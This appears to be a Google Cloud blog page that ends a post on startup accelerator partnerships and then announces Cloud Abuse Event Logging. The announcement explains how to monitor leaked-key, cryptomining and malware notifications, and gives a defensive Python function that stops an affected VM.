Plug and Play operates over 100 accelerator programs globally, accelerating more than 2,500 startups annually. Its portfolio includes over 30 unicorns and a network of 90,000 startups worldwide. They offer mentorship and access to a vast network of investors and industry leaders.
Gener8tor offers 75 programs globally, each with a highly selective, concierge-level experience for the startups that are selected.
MassChallenge stands out as an impact-focused, zero-equity accelerator, which allows startups to receive world-class support without giving up any ownership.
IIT Madras Incubation Cell is deeply integrated with India’s top engineering institute and provides a unique ecosystem that nurtures R&D-driven, deep-tech startups.
nasscom GenAI Foundry offers Indian GenAI startups access to GPU resources, fundraising, paid pilot and showcase opportunities, enablement on go-to-market, technology, Responsible AI, and intellectual property, through a network of 3,500+ industry members and subject matter experts.
Lanzadera is a prominent accelerator in Spain, unique in its adoption of a management model that drove its founder’s success in business, and its close collaboration with the business school EDEM and investment fund Angels, creating a flywheel of innovation.
We’re excited about all of the opportunities that will come from these new partnerships, as well as the increasing value of relationships we have with other accelerators. All of these programs and strategies illustrate our ever-expanding commitment to founders and startups that stand on the front lines of innovation.
Learn more
Companies who work with these accelerators should reach out to their accelerator Program Manager to learn more about getting started with Google Cloud.
At Google Cloud, we are deeply committed to partnering with our customers to help achieve stronger security outcomes.
As a part of this commitment, we’re excited to announce that Google Cloud customers can now track Cloud Abuse Events using Cloud Logging. These events can include leaked service account keys, crypto mining incidents, and malware.
When we identify one of these abuse issues affecting your cloud resources, you'll now receive two detailed notifications: one in a structured log format and one via email.
Cloud Abuse Event Logging is focused on providing a more efficient and effective method for customers to receive important abuse and security notifications. Previously, notifications were sent to customers only in an email, which at times created challenges around consistency, automation, and continuity.
In response to customer feedback, we developed Cloud Abuse Event Logging to help supplement email notifications. By leveraging these logs, customers can develop consistent, automated processes to resolve abuse and security issues more efficiently and effectively. Here are a few benefits:
Direct access in Cloud Logging: These notifications are readily available as logs in Cloud Logging, making them easier to find and manage.
Enhanced automation: The structured log format allows you to integrate these notifications into your existing security monitoring and incident response systems, which can help reduce the time it takes to address potential threats.
Historical trend analysis: Gain insights into past abuse events to identify patterns and proactively strengthen your security measures.
This new logging system reinforces our commitment to our customers, aligns with our shared fate model, and makes Google Cloud more secure. Cloud Abuse Events are provided on a best-effort basis to assist you in identifying potential abuse and we encourage you to combine these notifications with your own security practices for comprehensive protection.
Monitoring and dashboarding
This new integration of Cloud Abuse Events with Cloud Logging helps you strengthen your security with automated and timely notifications. You can use Cloud Monitoring to observe trends in your logs and notify you when specific conditions are met, such as receiving important types of abuse events. For example, based on the logs provided via Cloud Abuse Events, you can configure an alerting policy to notify you whenever we’ve become aware that your service account key has been leaked to the public.
You can also set up custom dashboards for your logs to get insights into the overall health and security of your environment. Cloud Abuse Events in Cloud Logging gives you many flexible options to effectively manage your security and monitoring. For example, if you’d like to aggregate the logs from each project in one place, an aggregate sink at the organization level may be useful. Additionally, you can use Log Analytics to run queries that analyze your log data, which allows you to easily chart and query results and can help uncover patterns and trends in your logs.
Automate response to abuse events
There are several ways to detect and respond to Cloud Logging events in real-time. For example, if you would like to configure automated deprovisioning of a VM after cryptomining has been detected on the instance, you can follow these steps:
Create a Logging sink with a filter that isolates crypto mining-related Abuse Events and directs them to your business logic.
Create a Pub/Sub topic. The Logging sink routes the filtered Abuse Events to this topic, and each Pub/Sub message asynchronously triggers a Cloud Function to act on the event, as shown in the sketch below.
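As an illustration of this automation, the sketch below shows a Pub/Sub-triggered Cloud Function that stops the affected VM. The payload field names used here are assumptions and should be mapped to the actual Cloud Abuse Event log format documented by Google Cloud.

# Minimal sketch: Pub/Sub-triggered Cloud Function that stops a VM referenced by an abuse event.
# The payload field names below are assumptions; map them to the documented log format.
import base64
import json

import functions_framework
from google.cloud import compute_v1


@functions_framework.cloud_event
def handle_abuse_event(cloud_event):
    # Pub/Sub message data arrives base64-encoded.
    payload = json.loads(base64.b64decode(cloud_event.data["message"]["data"]))

    # Hypothetical fields identifying the affected instance.
    project = payload["project_id"]
    zone = payload["zone"]
    instance = payload["instance_name"]

    client = compute_v1.InstancesClient()
    operation = client.stop(project=project, zone=zone, instance=instance)
    print(f"Requested stop of {instance} in {zone}: {operation.name}")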
You can ingest Cloud Abuse Event logs into Google Security Operations which lets you store, search, and examine aggregated security information for your enterprise. If you prefer to export your abuse logs to an external security information and event management system (SIEM) for further analysis or custom automation, you’ll need to route your logs to a supported destination, such as a Google Cloud Storage bucket or a Pub/Sub topic that can provide support for third-party integrations.
You can learn more about responding to abuse notifications and warnings by visiting our documentation. For technical information about the Cloud Abuse Event log payload format, see the reference documentation.